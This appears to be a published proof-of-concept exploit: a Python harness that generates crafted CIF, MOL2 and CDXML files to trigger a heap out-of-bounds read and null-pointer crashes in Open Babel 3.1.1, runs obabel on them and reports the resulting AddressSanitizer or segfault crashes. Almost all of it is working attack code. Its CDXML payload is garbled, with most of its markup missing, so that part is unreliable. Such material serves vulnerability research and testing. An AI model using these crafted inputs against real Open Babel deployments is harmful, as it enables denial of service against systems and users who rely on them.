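# =============================================================================================================================================
# | # Title : OpenBabel 3.1.1 Local Vulnerability Research & Crash Testing Framework |
# | # Author : indoushka |
# | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
# | # Vendor : https://openbabel.org/index.html |
# =============================================================================================================================================
#
# [+] Summary : This project is a local exploitation research and crash-detection framework designed to
#     evaluate memory-safety weaknesses in Open Babel 3.1.1 under controlled laboratory conditions.
#
# [+] The framework:
#     Generates specially crafted input files (CIF, MOL2, CDXML).
#     Executes the target obabel binary with AddressSanitizer (ASAN) enabled.
#     Detects and classifies memory-related crashes such as:
#         Heap Buffer Overflow
#         Segmentation Fault
#         General ASAN memory violations
#
# [+] POC :

#!/usr/bin/env python3
import subprocess
import os
import sys
import signal
import argparse
import tempfile
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass
from enum import Enum
import logging

logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S'
)
logger = logging.getLogger(__name__)


class VulnerabilityType(Enum):
    """Supported Vulnerability Types"""
    HEAP_OOB_READ = "heap_oob_read"
    NULL_PTR_MOL2 = "null_ptr_mol2"
    NULL_PTR_CDXML = "null_ptr_cdxml"


@dataclass
class ExploitConfig:
    """Settings for one harness run."""
    # Path of the obabel binary that is executed on each generated input.
    babel_path: str
    # Where obabel is told to write its conversion output (the null device by default).
    output_file: str = "NUL" if os.name == "nt" else "/dev/null"
    # Value exported as ASAN_OPTIONS to the child process. It only has an effect
    # when the target binary was itself built with AddressSanitizer.
    asan_options: str = "symbolize=1:abort_on_error=1:detect_leaks=0:detect_odr_violation=0"
    # Seconds before a run is abandoned.
    timeout: int = 5
    # When set, main() lowers the logger threshold to DEBUG.
    verbose: bool = False


class OpenBabelExploiter:
    """
    Harness that writes crafted CIF, MOL2 and CDXML inputs to temporary files
    and runs the configured obabel binary on them, classifying the outcome
    from the sanitizer output and the process return code.
    """

    def __init__(self, config: ExploitConfig):
        self.config = config
        self.env = {}
        self.setup_environment()

    def setup_environment(self):
        """Builds the environment passed to the child process.

        The parent environment is copied in full, then ASAN_OPTIONS,
        BABEL_LIBDIR and LD_LIBRARY_PATH are set. The library directory is
        taken to be ``../lib`` relative to the directory of the binary.
        """
        self.env = os.environ.copy()
        self.env["ASAN_OPTIONS"] = self.config.asan_options

        babel_dir = os.path.dirname(os.path.abspath(self.config.babel_path))
        lib_dir = os.path.abspath(os.path.join(babel_dir, "..", "lib"))
        self.env["BABEL_LIBDIR"] = lib_dir

        lib_path_key = "LD_LIBRARY_PATH"
        existing_path = self.env.get(lib_path_key)
        if existing_path:
            # os.pathsep instead of a literal ":" so the search path stays
            # well-formed on platforms whose separator differs.
            self.env[lib_path_key] = f"{existing_path}{os.pathsep}{lib_dir}"
        else:
            self.env[lib_path_key] = lib_dir

    def check_binary(self) -> bool:
        """Verifies binary existence and execution permissions.

        This does not check whether the binary was built with ASAN.
        """
        target = self.config.babel_path
        if not os.path.isfile(target):
            logger.error(f"Binary not found or is not a regular file: {target}")
            return False
        if not os.access(target, os.X_OK):
            logger.error(f"Binary does not have execution permissions: {target}")
            return False
        return True

    def generate_mol2_null_ptr(self) -> str:
        """Writes the MOL2 test input to a temporary file and returns its path."""
        mol2_content = (
            "@MOLECULE\n"
            "NULL_PTR_EXPLOIT\n"
            " 1 0 0 0 0\n"
            "SMALL\n"
            "USER_CHARGES\n\n"
            "@ATOM\n"
            " 1 C 0.0000 0.0000 0.0000 C.3 1 EXPLOIT 0.0000\n\n"
            "@BOND\n\n"
            "@SUBSTRUCTURE\n"
            " 1 EXPLOIT 1 TEMP 0 **** **** 0 ROOT\n\n"
            "@CHARGE\n"
            "2 0.5\n"
        )
        # mkstemp creates the file with an unpredictable name, readable only by the owner.
        fd, path = tempfile.mkstemp(suffix='.mol2', prefix='exploit_')
        with os.fdopen(fd, 'w') as f:
            f.write(mol2_content)
        return path

    def generate_cif_heap_oob(self) -> str:
        """Writes the CIF test input to a temporary file and returns its path."""
        symops = [f"'{i}*x, {i}*y, {i}*z'" for i in range(1, 21)]
        symops_str = '\n'.join(symops)
        cif_content = (
            "data_EXPLOIT_HEAP_OOB\n"
            "_cell_length_a 10.0\n"
            "_cell_length_b 10.0\n"
            "_cell_length_c 10.0\n"
            "_cell_angle_alpha 90.0\n"
            "_cell_angle_beta 90.0\n"
            "_cell_angle_gamma 90.0\n"
            "loop_\n"
            "_space_group_symop_operation_xyz\n"
            f"{symops_str}\n"
        )
        fd, path = tempfile.mkstemp(suffix='.cif', prefix='exploit_')
        with os.fdopen(fd, 'w') as f:
            f.write(cif_content)
        return path

    def generate_cdxml_null_ptr(self) -> str:
        """Writes the CDXML test input to a temporary file and returns its path."""
        # NOTE(review): most of the element markup in this literal appears to
        # have been lost when the page was extracted (a single tag survives),
        # so the text is kept exactly as shown and is not a complete CDXML
        # document.
        cdxml_content = (
            '\n'
            '\n'
            ' \n'
            ' \n'
            ' \n'
            ' <_natom id="99999"/>\n'
            ' \n'
            ' \n'
            ''
        )
        fd, path = tempfile.mkstemp(suffix='.cdxml', prefix='exploit_')
        with os.fdopen(fd, 'w') as f:
            f.write(cdxml_content)
        return path

    def create_payload(self, vuln_type: VulnerabilityType) -> Tuple[str, str]:
        """Creates the input file for *vuln_type*.

        Returns a ``(path, format)`` pair where *format* is the obabel input
        format name. Raises ValueError for a type with no generator. The
        caller owns the file and should pass it to cleanup().
        """
        if vuln_type == VulnerabilityType.HEAP_OOB_READ:
            return self.generate_cif_heap_oob(), "cif"
        if vuln_type == VulnerabilityType.NULL_PTR_MOL2:
            return self.generate_mol2_null_ptr(), "mol2"
        if vuln_type == VulnerabilityType.NULL_PTR_CDXML:
            return self.generate_cdxml_null_ptr(), "cdxml"
        raise ValueError(f"Unsupported vulnerability type: {vuln_type}")

    def execute_exploit(self, file_path: str, file_ext: str) -> Dict:
        """Runs obabel on *file_path* and classifies the outcome.

        The returned dict has the keys ``vulnerability_triggered``, ``crash``,
        ``crash_type``, ``execution_time`` and ``return_code``. A run that
        times out or cannot be started is reported through ``crash_type``
        ("Timeout" / "Execution Error") with both flags left False, so that
        it is not mistaken for a run that completed without a crash.
        """
        cmd = [self.config.babel_path, f"-i{file_ext}", file_path, "-osmi", "-O", self.config.output_file]
        result = {
            "vulnerability_triggered": False,
            "crash": False,
            "crash_type": "None",
            "execution_time": 0,
            "return_code": None
        }
        logger.debug("Running: %s", cmd)

        start_time = time.time()
        try:
            # errors="replace" keeps a report that contains undecodable bytes
            # instead of losing the whole run to a decode error.
            process = subprocess.run(cmd, env=self.env, capture_output=True, text=True,
                                     errors="replace", timeout=self.config.timeout)
        except subprocess.TimeoutExpired:
            result["execution_time"] = time.time() - start_time
            result["crash_type"] = "Timeout"
            logger.error("Execution timeout expired.")
            return result
        except Exception as e:
            # Best effort: the target could not be run at all (missing binary,
            # permissions, ...). Log it and report it distinctly.
            result["crash_type"] = "Execution Error"
            logger.error(f"Execution error: {e}")
            return result

        result["execution_time"] = time.time() - start_time
        result["return_code"] = process.returncode
        logger.debug("Return code: %s", process.returncode)

        output = process.stderr + process.stdout
        if "ERROR: AddressSanitizer" in output:
            result["crash"] = True
            result["vulnerability_triggered"] = True
            result["crash_type"] = "Heap Buffer Overflow" if "heap-buffer-overflow" in output else "ASAN Error"
        elif process.returncode in (-signal.SIGSEGV, 139):
            # -SIGSEGV is how subprocess reports death by signal; 139 is the
            # 128 + 11 form a shell reports for the same event.
            result["crash"] = True
            result["vulnerability_triggered"] = True
            result["crash_type"] = "Segmentation Fault"
        return result

    def run_all_exploits(self) -> Dict[str, Dict]:
        """Runs every test case in turn and returns the results keyed by enum value."""
        results = {}
        for v_type in VulnerabilityType:
            logger.info(f"Testing vulnerability: {v_type.name}")
            file_path, ext = self.create_payload(v_type)
            try:
                results[v_type.value] = self.execute_exploit(file_path, ext)
            finally:
                # Remove the crafted file even when the run is interrupted.
                self.cleanup(file_path)
        return results

    def cleanup(self, file_path: Optional[str]):
        """Removes a temporary input file; a failed deletion is logged, not raised."""
        if file_path and os.path.exists(file_path):
            try:
                os.unlink(file_path)
            except Exception as e:
                logger.warning(f"Failed to delete {file_path}: {e}")


def display_report(results: Dict):
    """Prints one table row per result: identifier, status and crash detail."""
    print("\n" + "═"*65)
    print(f"{'Vulnerability ID':<20} | {'Status':<15} | {'Crash Detail':<25}")
    print("─"*65)
    for name, res in results.items():
        status = " TRIGGERED" if res["vulnerability_triggered"] else " FAILED"
        print(f"{name:<20} | {status:<15} | {res['crash_type']:<25}")
    print("═"*65 + "\n")


def print_banner():
    """Prints the tool banner."""
    banner = """
    ╔══════════════════════════════════════════════════════════╗
    ║ Open Babel 3.1.1 - Local Exploitation Framework ║
    ║ Vulnerability Research & Testing Tool ║
    ║ By indoushka ║
    ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)


def parse_args():
    """Parses the command line (binary path, test case, output file, verbosity)."""
    parser = argparse.ArgumentParser(description="Open Babel Vulnerability Research Framework")
    parser.add_argument("-b", "--babel-path", default="./obabel", help="Path to obabel binary")
    parser.add_argument("-t", "--target", choices=['cif', 'mol2', 'cdxml', 'all'], default='all', help="Target exploit")
    parser.add_argument("-o", "--output", help="Output file (default: /dev/null or NUL)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
    return parser.parse_args()


def main():
    """Command-line entry point: checks the binary, runs the selected case(s), prints the report."""
    print_banner()
    args = parse_args()

    config = ExploitConfig(babel_path=args.babel_path, verbose=args.verbose)
    if args.output:
        config.output_file = args.output
    if config.verbose:
        # -v previously had no effect; it now enables the DEBUG messages.
        logger.setLevel(logging.DEBUG)

    exploiter = OpenBabelExploiter(config)
    if not exploiter.check_binary():
        logger.error("Binary check failed. Ensure Open Babel is built with ASAN.")
        sys.exit(1)

    try:
        if args.target == "all":
            logger.info("Starting automated exploitation sequence...")
            results = exploiter.run_all_exploits()
            display_report(results)
        else:
            v_map = {
                "cif": VulnerabilityType.HEAP_OOB_READ,
                "mol2": VulnerabilityType.NULL_PTR_MOL2,
                "cdxml": VulnerabilityType.NULL_PTR_CDXML
            }
            v_type = v_map[args.target]
            file_path, ext = exploiter.create_payload(v_type)
            try:
                res = exploiter.execute_exploit(file_path, ext)
            finally:
                # Do not leave the crafted file behind if the run is interrupted.
                exploiter.cleanup(file_path)
            display_report({args.target: res})
    except KeyboardInterrupt:
        logger.info("\nExploit interrupted by user.")
        sys.exit(0)


if __name__ == "__main__":
    main()

# Greetings to :==============================================================================
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
# ============================================================================================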